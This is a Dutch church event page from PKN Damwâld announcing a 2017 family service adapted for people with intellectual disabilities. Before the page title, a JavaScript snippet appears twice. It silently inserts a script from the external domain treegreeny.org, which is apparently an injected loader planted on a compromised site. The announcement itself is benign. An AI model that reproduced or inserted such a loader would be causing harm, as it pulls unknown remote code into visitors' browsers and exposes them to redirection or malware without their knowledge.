;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bijzondere gezinsdienst ... Welkom ! - PKN Damwâld
23 april 2017
14:00 t/m 15:00
De Ikker
Bijzondere gezinsdienst … Welkom !

Zondagmiddag 23 april 2017 bent u om 14.00 uur van harte welkom in De Ikker voor een bijzondere gezinsdienst. Vanuit het Bijbelgedeelte Johannes 20: 11-18 zal ds. G. Timmer in gaan op het thema ‘Leven’. Van harte welkom !

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op de mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.

Locatie: De IkkerHearewei 1, Damwâld